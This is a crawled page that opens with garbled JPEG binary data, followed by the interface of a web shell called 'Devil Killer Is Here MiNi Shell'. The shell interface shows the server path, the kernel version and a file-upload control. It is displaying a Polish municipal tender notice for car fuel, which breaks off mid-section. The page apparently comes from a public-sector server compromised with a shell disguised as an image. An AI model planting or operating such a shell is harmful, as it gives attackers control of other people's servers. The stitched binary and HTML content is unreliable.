JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220121/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220121/0002999801-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> „Zakup paliwa oraz płynu katalitycznego do samochodów służbowych Urzędu Miejskiego w Dąbrowie Górniczej” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Dąbrowa Górnicza</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 276255312</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Graniczna 21</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Dąbrowa Górnicza</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">41-300</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL22B - Sosnowiecki</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">azareba@dg.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://www.bip.dabrowa-gornicza.pl/5823</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Zakup paliwa oraz płynu katalitycznego do samochodów służbowych Urzędu Miejskiego w Dąbrowie Górniczej” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-7bc4a8d5-782d-11ec-beb3-a2bfa38226ab</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00029998</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-01-21</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00000965/35/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.6 Zakup paliwa oraz płynu katalitycznego do samochodów służbowych Urzędu Miejskiego w Dąbrowie Górniczej .</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://dg.logintrade.net/rejestracja/ustawowe.html <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1.	W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa się przy użyciu Platformy do elektronicznej obsługi zamówień (zwanej dalej: „Platformą”) dostępnej pod adresem: https://dg.logintrade.net/rejestracja/ oraz poczty elektronicznej wskazanej w rozdziale I sekcja 1. <br/>2.	Osobą upoważnioną przez Zamawiającego do kontaktowania się z Wykonawcami w sprawach merytorycznych przetargu jest - Agnieszka Zaręba – Inspektor WOU. <br/>3.	Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi posiadać konto na Platformie. Wykonawca posiadający konto na Platformie ma możliwość złożenia, wycofania oferty oraz składania wniosków o wyjaśnienie treści SWZ.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wymagania techniczne i organizacyjne wysyłania i odbierania przekazania przedmiotowych środków<br/>dowodowych, podmiotowych środków dowodowych oraz innych oświadczeń i dokumentów przy ich<br/>użyciu zostały opisane poniżej:<br/>1) Do połączenia używany jest szyfrowany protokół HTTPS. Szyfrowanie danych odbywa się przy<br/>pomocy protokołu SSL. Certyfikat SSL zapewnia poufność transmisji danych przesyłanych przez<br/>Internet. Wykonawca posiadający konto na Platformie ma dostęp do możliwości złożenia, wycofania<br/>oferty, a także funkcjonalności pozwalających na zadawanie pytań do treści SWZ oraz komunikację z<br/>Zamawiającym w pozostałych obszarach.<br/>2) Wymagania techniczne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii<br/>dokumentów i oświadczeń oraz informacji przekazywanych przy użyciu Platformy:<br/>a) Dopuszczalne przeglądarki internetowe:<br/> Internet Explorer 8, Internet Explorer 9, Internet Explorer 10, Internet Explorer 11,<br/> Google Chrome 31<br/> Mozilla Firefox 26<br/>Opera 18<br/>b) Pozostałe wymagania techniczne:<br/> dostęp do sieci Internet<br/> obsługa przez przeglądarkę protokołu XMLHttpRequest - ajax<br/> włączona obsługa JavaScript<br/> zalecana szybkość łącza internetowego powyżej 500 KB/s<br/> zainstalowany Acrobat Reader<br/> zainstalowane środowisko uruchomieniowe Java - Java SE Runtime Environment 6 Update 24 lub<br/>nowszy<br/>c) W przypadku aukcji z podpisem elektronicznym dopuszczalne są przeglądarki internetowe:<br/> dla Windows Vista: Internet Explorer 8, Internet Explorer 9<br/> dla Windows 7: Internet Explorer 9, Internet Explorer 11<br/> dla Windows 8: Internet Explorer 11<br/> dla Windows 10: Internet Explorer 11<br/>d) Wspierane są rozwiązania dostarczane przez firmy:<br/> Polskie Centrum Certyfikacji Elektronicznej Sigillum Polskiej Wytwórni Papierów Wartościowych S.A.<br/> Centrum Obsługi Podpisu Elektronicznego Szafir Krajowej Izby Rozliczeniowej S.A.<br/> Powszechne Centrum Certyfikacji Certum firmy Asseco Data Systems S.A. (dawniej: Unizeto<br/>Technologies SA.)<br/> Kwalifikowane Centrum certyfikacji Kluczy CenCert firmy Safe Technologies S.A.<br/>3) Dopuszczalne formaty przesyłanych danych<br/>image/bmp, image/x-windows-bmp, application/msword, application/drafting, image/gif, application/xcompressed,<br/>application/x-gzip, multipart/x-gzip, image/jpeg, image/pjpeg, application/x-latex,<br/>application/pdf, image/pict, image/png, application/mspowerpoint, application/postscript, application/rtf,<br/>application/x-rtf, text/richtext, image/tiff, image/x-tiff, application/mswrite, application/excel,<br/>application/x-excel, application/vnd.ms-excel, application/x-msexcel, application/vnd.ms-excel, text/xml,<br/>application/x-zip-compressed, application/zip, application/vnd.ms-office, image/x-ms-bmp, video/xmsvideo,<br/>audio/x-ms-wma, application/vnd.oasis.opendocument.spreadsheet, application/acad,<br/>application/x-acad, application/autocad_dwg, image/x-dwg, application/dwg, application/x-dwg,<br/>application/x-autocad, image/vnd.dwg, drawing/dwg<br/>4) Kodowanie i oznaczenie czasu przekazania danych<br/>Czas zapisywany jest w formacie YYYY-MM-DD HH:MM:SS. Za datę przekazania oferty,<br/>zawiadomień, dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub<br/>oświadczeń oraz innych informacji przyjmuje się datę ich wpływu na Platformę, a nie datę wykonanie<br/>danej czynności przez Wykonawcę na Platformie<br/>5. Maksymalny rozmiar plików przesyłanych za pośrednictwem Platformy wynosi 150 MB.<br/>Kontynuacja zapisów w Rozdziale VII SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w<br/>związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz<br/>uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119<br/>z04.05.2016, str. 1), dalej „RODO”, Zamawiający informuję, że: 1) administratorem Pani/Pana danych<br/>osobowych jest Prezydent Miasta Dąbrowa Górnicza z siedzibą w Urzędzie Miejskim w Dąbrowie<br/>Górniczej, przy ul. Granicznej 21, tel.: (32) 295 67 00, e-mail: um@dg.pl; 2) Administrator wyznaczył w<br/>Urzędzie Miejskim Inspektora Ochrony Danych: Panią Mirosławę Danecką - Pełnomocnik ds. Ochrony<br/>Informacji Niejawnych i Inspektor Ochrony Danych, z którą może się Pani/Pan skontaktować w<br/>sprawach związanych z ochroną danych osobowych, w następujący sposób:a) pod adresem poczty elektronicznej iodo@dg.pl, b) pisemnie na adres siedziby Administratora, c) telefonicznie pod nr tel.<br/>(32) 295 68 25.3) Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO<br/>w celu związanym z niniejszym postępowaniem o udzielenie zamówienia publicznego, odbiorcami<br/>Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja<br/>postępowania w oparciu o art. 18 oraz art. 74 ust. 1 ustawy Pzp; 4) Pani/Pana dane osobowe będą<br/>przechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp, przez okres 4 lat od dnia zakończenia<br/>postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres<br/>przechowywania obejmuje cały czas trwania umowy; zgodnie z Rozporządzeniem Prezesa Rady<br/>Ministrów z dnia 18 stycznia 2011 r. w sprawie instrukcji kancelaryjnej, jednolitych rzeczowych<br/>wykazów akt oraz instrukcji w sprawie organizacji i zakresu działania archiwów zakładowych (tj. Dz.U<br/>z2011 nr 14, poz. 67 z późn. zm.) teczki aktowe będą przechowywane w archiwum zakładowym przez<br/>okres 5 lat w przypadku dokumentacji zamówień publicznych oraz 10 lat w przypadku umów zawartych<br/>w wyniku postępowania w trybie zamówień publicznych; ) obowiązek podania przez Panią/Pana<br/>danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w<br/>przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia<br/>publicznego;konsekwencje niepodania określonych danych wynikają z ustawy Pzp; 6) w odniesieniu do<br/>Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany,<br/>stosowanie do art. 22RODO;7) posiada Pani/Pan:− na podstawie art. 15 RODO prawo dostępu do<br/>danych osobowych Pani/Pana dotyczących;− w przypadku, gdy wykonanie obowiązków, o których<br/>mowa w art. 15 ust. 1-3RODO wymagałoby niewspółmiernie dużego wysiłku, Zamawiający może<br/>żądać od osoby, której dane dotyczą, wskazania dodatkowych informacji mających na celu<br/>sprecyzowanie żądania, w szczególności podania nazwy lub daty postępowania o udzielenie<br/>zamówienia publicznego;− w przypadku, gdy wykonanie obowiązków, o których mowa w art. 15 ust. 1-3<br/>RODO wymagałoby niewspółmiernie dużego wysiłku, Zamawiający może żądać od osoby, której dane<br/>dotyczą, wskazania dodatkowych informacji mających w szczególności na celu sprecyzowanie nazwy<br/>lub daty zakończonego postępowania o udzielenie zamówienia publicznego.− na podstawie art. 16<br/>RODO prawo do sprostowania Pani/Pana danych osobowych (przy czym korzystanie z prawa do<br/>sprostowania nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego<br/>ani zmianą postanowień umowy w zakresie niezgodnym z ustawą Pzp oraz nie może naruszać<br/>integralności protokołu oraz jego załączników) - kontynuacja w sekcji poniżej</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Na podstawie art. 18 RODO prawo żądania od<br/>administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których<br/>mowa w art. 18 ust. 2 RODO (przy czym prawo do ograniczenia przetwarzania nie ma zastosowania w<br/>odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w<br/>celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu<br/>publicznego Unii Europejskiej lub państwa członkowskiego); − wystąpienie z żądaniem, o którym mowa<br/>w art. 18 ust. 1 RODO , nie ogranicza przetwarzania danych osobowych do czasu zakończenia<br/>postępowania o udzielenie zamówienia publicznego;− prawo do wniesienia skargi do Prezesa Urzędu<br/>Ochrony Danych Osobowych, jeśli uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana<br/>dotyczących narusza przepisy RODO;8) nie przysługuje Pani/Panu:− w związku z art. 17 ust. 3 lit. b, d<br/>lub e RODO prawo do usunięcia danych osobowych; − prawo do przenoszenia danych osobowych, o<br/>którym mowa w art. 20 RODO;− na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania<br/>danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6<br/>ust.1 lit. c RODO. 2. Jednocześnie Zamawiający przypomina o ciążącym na Wykonawcy obowiązku<br/>informacyjnym wynikającym z art. 14 RODO względem osób fizycznych, których dane przekazane<br/>zostaną Zamawiającemu w związku z prowadzonym postępowaniem i które Zamawiający pośrednio<br/>pozyska od Wykonawcy biorącego udział w postępowaniu, chyba że ma zastosowanie co najmniej<br/>jedno z wyłączeń, o których mowa w art. 14 ust. 5 RODO.3. Skorzystanie przez osobę, której dane<br/>osobowe dotyczą, z uprawnienia do sprostowania lub uzupełnienia, o którym mowa w art. 16<br/>RODO,nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia ani zmianą<br/>postanowień umowy w sprawie zamówienia publicznego w zakresie niezgodnym z ustawą Pzp. 4. W<br/>postępowaniu o udzielenie zamówienia zgłoszenie żądania ograniczenia przetwarzania, o którym<br/>mowa w art. 18 ust. 1RODO, nie ogranicza przetwarzania danych osobowych do czasu zakończenia<br/>tego postępowania.5.,,Polityka praw i wolności” obowiązująca w Urzędzie Miejskim w Dąbrowie<br/>Górniczej zakłada prawo do:dostępu do treści swoich danych i ich poprawienia, sprostowania,<br/>usunięcia, ograniczenia przetwarzania, wniesienia sprzeciwu, cofnięcia zgody na przetwarzanie.<br/>Wycofanie zgody nie ma wpływu na przetwarzanie Pani/Pana danych do momentu jej wycofania.<br/>Pani/Pana prawa mogą zostać ograniczone zgodnie z przepisami RODO. Pani/Pana prawa na<br/>wniosek zrealizuje Administrator danych.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.WOU.271.4. 2 .2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> OPIS PRZEDMIOTU ZAMÓWIENIA<br/>1)	Przedmiot zamówienia obejmuje zakup paliw płynnych oraz płynu katalitycznego do samochodów służbowych będących na stanie Zamawiającego w szacunkowych ilościach przedstawionych poniżej:<br/>- Benzyna PB 95 – 11 400 litrów<br/>- Benzyna PB 98 – 9 600 litrów<br/>- Olej napędowy ON – 19 200 litrów<br/>- Olej napędowy (premium) – 2 400 Litrów<br/>- Płyn katalityczny – 300 litrów<br/>2) Wskazane zużycie paliw oraz płynu katalitycznego jest ilością szacunkową w celu określenia wartości zamówienia, co nie odzwierciedla realnego wykorzystania ilości paliw oraz płynu katalitycznego w czasie trwania umowy i w żadnym razie nie może być podstawą jakichkolwiek roszczeń ze strony Wykonawcy. Zamawiający zastrzega sobie możliwość zużycia mniejszej lub większej ilości paliw oraz płynu katalitycznego w stosunku do podanych wyżej ilości w czasie trwania umowy, za kwotę nie większą niż maksymalna wartość umowy brutto i nie mniejszą niż 60% maksymalnej wartości umowy brutto. <br/>3) Sukcesywny zakup paliw oraz płynu katalitycznego będzie polegać na bezgotówkowej sprzedaży , która musi umożliwić prowadzenie przez Wykonawcę ewidencji pobranego paliwa oraz płynu katalitycznego dla poszczególnych pojazdów z podaniem daty i miejsca tankowania, ilości i wartości pobranego paliwa i płynu katalitycznego, numeru rejestracyjnego pojazdu, imienia i nazwiska osoby (dotyczy sprzętu silnikowego). <br/>4) Zamawiający wymaga, aby zakup paliwa oraz płynu katalitycznego dokonywany był w formie bezgotówkowej. Wykonawca winien jest dysponować możliwością bezgotówkowego rozliczania pobieranego paliwa oraz płynu katalitycznego przy zastosowaniu kart paliwowych, przy częstotliwości wystawiania faktur nie częściej niż raz w miesiącu. Zamawiający dopuszcza możliwość wystawienie faktury zbiorczej dwa razy w miesiącu.<br/>5) Karty paliwowe wydane będą bezpłatnie oraz będą zabezpieczone numerem PIN. Z tytułu użytkowania ww. kart Zamawiający nie będzie ponosił żadnych dodatkowych kosztów. Regulamin używania kart określi Wykonawca deklarując, iż nie będzie w nim zawartych postanowień sprzecznych z umową. <br/>6) Zamawiający przewiduje wydanie do 44 kart paliwowych przypisanych do pojazdów lub pracowników Zamawiającego w terminie do 10 dni roboczych od daty przekazania niezbędnych informacji (wniosków). Listę samochodów oraz sprzętu silnikowego Zamawiający przekaże Wykonawcy przed zawarciem umowy.<br/>7) W przypadku zgubienia, kradzieży lub innej utraty karty paliwowej przez Zamawiającego, Wykonawca wystawia nową kartę, w terminie 10 dni roboczych od dnia otrzymania zgłoszenia od Zamawiającego (najpóźniej w 10 dniu roboczym Zamawiający otrzymuje karty). Wykonawca może pobrać opłatę za wystawienie takich kart nie większą, niż 15,00 zł netto za 1 kartę. <br/>8) W przypadku zakupienia przez Zamawiającego nowego pojazdu lub sprzętu, Wykonawca wystawia kolejną kartę, w terminie 10 dni roboczych od dnia otrzymania zgłoszenia od Zamawiającego (najpóźniej w 10 dniu roboczym Zamawiający otrzymuje karty - bezpłatnie). <br/>9) Wykonawca winien dysponować stacjami paliw spełniającymi wymogi przewidziane dla stacji paliw zgodnie z Rozporządzeniem Ministra Gospodarki z dnia 21 listopada 2005 r. w sprawie warunków technicznych, jakim powinny odpowiadać bazy i stacje paliw płynnych, rurociągi przesyłowe dalekosiężne służące do transportu ropy naftowej i produktów naftowych i ich usytuowanie (Dz.U. 2014 poz. 1853 z póź.zm.),<br/>10) Wykonawca przedstawi wykaz stacji paliw będących w jego dyspozycji w województwach: śląskim, mazowieckiem, wielkopolskim i dolnośląskim obsługujących bezgotówkowe elektroniczne karty paliwowe, w tym: co najmniej 2 stacje paliwowe muszą znajdować się na terenie miasta Dąbrowa Górnicza, z czego 1 stacja paliwowa Wykonawcy musi znajdować się w odległości nie więcej niż 10 km od siedziby Zamawiającego przy ul. Granicznej 21.<br/>11) Wykonawca winien umożliwić tankowanie paliwa oraz płynu katalitycznego na dysponowanych przez niego stacjach paliw 24 godziny na dobę przez 7 dni w tygodniu, w tym w dni wolne oraz święta. Za brak możliwości tankowania paliwa uznaje się wyłącznie remont stacji paliw, awarię, przyjęcie paliwa na stację paliw.<br/>12) Sprzedawane przez Wykonawcę paliwo musi spełniać wymagania określone w Rozporządzeniu Ministra Gospodarki z dnia 09 października 2015 r. w sprawie wymagań jakościowych dla paliw ciekłych (Dz. U. z 2015 poz. 1680) oraz Rozporządzenia Ministra Klimatu z dnia 22 kwietnia 2020r. zmieniające rozporządzenie w sprawie wymagań jakościowych dla paliw ciekłych (Dz.U. 2020 poz. 727). <br/>Szczegółowy opis przedmiotu zamówienia zawiera załącznik nr 4. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">09100000-0 - Paliwa</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">09132100-4 - Benzyna bezołowiowa</p> <p class="mb-0">09134100-8 - Olej napędowy</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">24 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.1.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:<br/>1.	nie podlegają wykluczeniu,<br/>2.	